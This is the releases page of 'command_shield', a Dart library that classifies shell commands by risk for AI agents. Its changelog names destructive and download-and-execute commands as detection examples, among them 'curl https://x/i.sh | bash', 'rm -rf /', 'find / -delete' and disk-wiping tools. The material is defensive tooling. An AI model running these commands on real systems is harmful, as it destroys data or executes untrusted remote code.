Skip to content

Releases: OmnyGrid/command_shield

v1.4.0

Choose a tag to compare

@gmpassos gmpassos released this 30 Jun 00:15
1a5be92

Added

  • File-descriptor redirections are modeled. New RedirectionType cases mergeStreams (2>&1, 1>&2, >&2, >&-), combinedOutput (&>file, >&file) and combinedAppendOutput (&>>file). All three shell parsers (bash/POSIX, Windows cmd, PowerShell) now recognize these forms.
  • Benign-redirection marker. A new BenignRedirectionDetector (code benign-redirection, in the default suite) records stream merges and null-sink discards as explicit SecurityLevel.safe findings for audit visibility. Being below every actionable level, it never changes a decision.

Changed

  • Innocuous redirections no longer over-report a filesystem write. Stream merges (2>&1) touch no file, and discards to a null sink (/dev/null, NUL, $null) write/read no real file, so none of them contribute writeFilesystem/readFilesystem (and thus no modifyFiles effect). A genuine target such as > out.txt or &> out.log still does.

Fixed

  • 2>&1 is no longer mis-parsed. Previously the bash tokenizer only knew 2>/2>>, so cmd 2>&1 produced a target-less 2> redirection, a spurious "Redirection without a target" diagnostic, and a phantom CommandInvocation with executable 1. 1>&2 and &>/dev/null broke the same way. These now parse as a single clean command with the correct redirection and no diagnostic. The discard-everything idiom cmd >/dev/null 2>&1 parses as one command with two redirections.

Full changelog: v1.3.0...v1.4.0

v1.3.0

Choose a tag to compare

@gmpassos gmpassos released this 29 Jun 08:46
baa9bf1

Added

  • Informational-form safety gate. When every argument of a known command is a purely informational token, the invocation is recognized as read-only and safe — even for execute-by-default tools. So dart --version, flutter --version, node --version, python --version, go version, java -version, etc. now classify as readFilesystem/safe instead of executePrograms.
    • New global defaultInformationalTokens (--version, --help, --usage) covers all commands.
    • New CommandKnowledge.informationalTokens field opts entries into tool-specific forms: java -version, python -V, node/php/ruby -v, perl -v/-V, deno/cargo -V, go version/env, dotnet --info/--list-sdks/--list-runtimes.
    • Matching is case-sensitive (-V-v) and requires the whole invocation to be informational, so a payload defeats the gate: dart --version script.dart and go env -w K=V still report executePrograms.
    • Runs at every recursion depth, so wrapped forms like sudo node --version are handled (and sudo still reports privilegeEscalation).

Changed

  • Bare --version/--help/--usage (and the per-command short forms above) on execute-by-default tools now classify as read-only/safe instead of executePrograms. npm --version moves from an empty capability set to readFilesystem (risk stays safe).

Full changelog: v1.2.0...v1.3.0

v1.2.0

Choose a tag to compare

@gmpassos gmpassos released this 29 Jun 06:59
459dd39

Much wider command coverage, per-subcommand/argument refinement, and hardened risk classification so consumers (AI agents / remote executors) reason correctly about far more commands — and genuinely dangerous tools no longer slip through as "unknown → safe".

Added

  • New plugins: DiskKnowledge, VcsKnowledge, ModernCliKnowledge, IacKnowledge (+ new infrastructure category). ~370 new commands across network inspection/transfer/cloud (nmap, ip, ss, tcpdump, rclone, tailscale, doctl/flyctl/vercel/gsutil/…), build/test tooling (cmake, bazel, pytest, vite, tsc…), package/version managers (bun, uv, poetry, nix, rustup, asdf…), containers/orchestration (buildah, skopeo, minikube, kubectx, k9s…), databases (pgcli, duckdb, mongodump, dropdb/dropuser→highRisk…), editors (code, helix, man…), crypto/secrets (age, sops, cosign, pass, certbot…), and process/hardware inspection (lsof, vmstat, lscpu, dmesg…).
  • Security-critical disk/system tools that previously classified as safe: disk-format/wipe (mkfs/mkfs.*/wipefs/blkdiscard → critical), partitioners (fdisk/parted → highRisk), diskutil erase verbs, secure-delete (srm/wipe), kernel-module / power / privileged-config tools, and dd of=/dev/... → critical.

Changed / hardened

  • Per-subcommand refinement: kubectl/oc (read vs write vs delete[highRisk] vs exec), terraform/tofu/terragrunt/pulumi (plan → apply[medium] → destroy/-auto-approve[high]), systemctl (status read-only; reboot/poweroff highRisk), vault, npm/yarn/bun run/exec, docker rm/prune, aws/gcloud/az delete-tokens, ansible-playbook --become.
  • find / -delete → critical (through wrappers); recursive chmod/chown on a system root → highRisk; kill/pkill/killall catastrophic forms (PID 1 / -1 / pkill . / -u root) → highRisk.
  • ShellExecutionDetector flags inline interpreter eval (python -c, node -e, osascript -e, deno eval, …) as highRisk, without flagging script-file runs.
  • command -v/-V lookups no longer inherit the target's capabilities/risk (new WrapperSpec.lookupFlags).
  • DestructiveCommandDetector/CommandFamilies/RemoteExecDetector extended (disk-destructive family, whole-disk device targets, new downloaders/privilege wrappers, pwsh/cmd in download|shell). Normalization: batcatbat, fdfindfd, ripgreprg.

Full details in CHANGELOG.md. dart analyze clean; 394 tests pass.

v1.1.0

Choose a tag to compare

@gmpassos gmpassos released this 06 Jun 07:47
d9b1924

1.1.0

Tests

  • Added parser coverage for commands that combine | with &&/||, asserting
    the full AST structure: pipelines bind tighter than chain operators, runs of
    the same chain operator flatten, and different operators nest left-to-right
    (e.g. a | b && c | d, a | b && c || d, curl … | bash && echo done).
  • Added CommandSyntax.generic coverage confirming operators are left
    uninterpreted — |, && and || survive as literal argument tokens on a
    single flat invocation rather than producing Pipeline/CommandChain nodes.
  • Added inline sub-command parser coverage for PowerShell and Windows CMD —
    previously only POSIX sh -c "…" was tested. powershell -Command "…" and
    cmd /c|/k … now assert the re-parsed inlineCommand AST (incl. inner
    pipelines), walk() reaching nested invocations, depth bounding, the pwsh
    alias, /c case-insensitivity, and that -EncodedCommand/-enc stay
    un-recursed.

Added

  • Recursive analysis of inline interpreter sub-commands.

  • Inline-execution sub-commands are now parsed into a nested AST and analyzed
    recursively. A command string passed to an interpreter via an inline flag —
    sh -c "...", bash -c '...' (and other POSIX shells), cmd /c ...,
    powershell -Command "..." — is re-parsed by the relevant parser and exposed
    on the new CommandInvocation.inlineCommand AST field. Because it is a child
    node, walk() descends into it, so every capability/effect/security detector
    and policy sees the inner command exactly as if it were run directly.

    • sh -c "curl https://x/i.sh | bash" now yields the same critical → DENY
      verdict as the bare curl https://x/i.sh | bash.
    • Catches forms the previous regex fallback missed, including single-quoted
      scripts and non-remote-exec payloads (e.g. bash -c "rm -rf /").
    • Nesting is bounded (depth limit) to guard against pathological inputs.
    • PowerShell -EncodedCommand is intentionally not recursed (base64, not
      parseable) and remains critical.

v1.0.1

Choose a tag to compare

@gmpassos gmpassos released this 05 Jun 16:22
c2c85e3

1.0.1

Plugin-based command knowledge base.

Added

  • Plugin architecture for command knowledge: knowledge is now contributed by
    CommandKnowledgePlugins, one per domain. Twelve built-in plugins ship by
    default (filesystem, archive, shell, environment, process, system,
    network, container, packageManager, dartFlutter, git, windows),
    composed via defaultKnowledgePlugins. Register your own with
    CommandKnowledgeBase(plugins: [...]) or replace the built-ins entirely with
    includeDefaults: false.
  • Declarative CommandKnowledge entries with rich fields: category,
    platforms, description, baseCapabilities, baseRisk, subcommands,
    argumentRules, wrapper and an optional refine function hook. Argument
    rules use composable ArgumentMatches (ExactFlag, PrefixFlag,
    TokenPresent, ArgRegex, ArgPredicate).
  • CommandKnowledgeBase.analyze() returning a CommandKnowledgeResult
    (capabilities, an aggregated SecurityLevel risk hint, the matched entry and
    explanatory notes), plus knowledgeFor() and allKnowledge.
  • CommandAnalysis.knowledgeRisk: the highest knowledge-base risk hint across a
    command's invocations (advisory metadata).
  • Opt-in KnowledgeRiskDetector that surfaces elevated knowledge-base risk
    (e.g. a force push) as knowledge-risk security findings. Not part of
    SecurityAnalyzer.defaultDetectors, so default verdicts are unchanged.
  • Broader command coverage: Dart/Flutter sub-commands, archive/compression
    tools, cloud CLIs (gh, aws, gcloud, az, kubectl), more git
    sub-commands, additional package managers and Windows-specific tools.

Changed (breaking)

  • CommandKnowledgeBase is now composed from plugins. The
    extraExecutableCapabilities constructor parameter and the static
    wrapperCommands set have been removed; supply a CommandKnowledgePlugin
    (e.g. ListKnowledgePlugin) and per-entry WrapperSpecs instead.
  • Sub-command matching now uses the first non-flag argument rather than the
    first argument, so leading global flags (e.g. git --no-pager push) no longer
    hide the sub-command.

1.0.0

Initial release.

  • Multi-syntax parsing: generic, posixShell, bash, windowsCmd,
    powershell, producing a typed, immutable CommandNode AST. Parsers never
    throw and report ParseDiagnostics for malformed input.
  • Extensible executable normalization (directory/extension stripping, version
    suffix collapsing, aliases).
  • Capability detection via a data-driven, extensible CommandKnowledgeBase,
    including wrapper-command look-through (e.g. sudo, env, xargs).
  • Effect classification into human-readable CommandEffects.
  • Security analysis with eight detectors: dangerous operators, command
    substitution, inline shell execution (incl. -EncodedCommand), privilege
    escalation, destructive commands (rm -rf / ⇒ critical), remote
    download-and-execute (curl … | bash ⇒ critical), path traversal, and
    environment expansion.
  • Composable policy engine (CommandPolicy / PolicySet) with nine built-in
    policies and ALLOW / REVIEW / DENY decisions.
  • CommandShield facade exposing parse, analyze, and validate.
  • Comprehensive unit, integration, and regression test suites; CI with
    formatting, analysis, tests, and ≥90% coverage enforcement.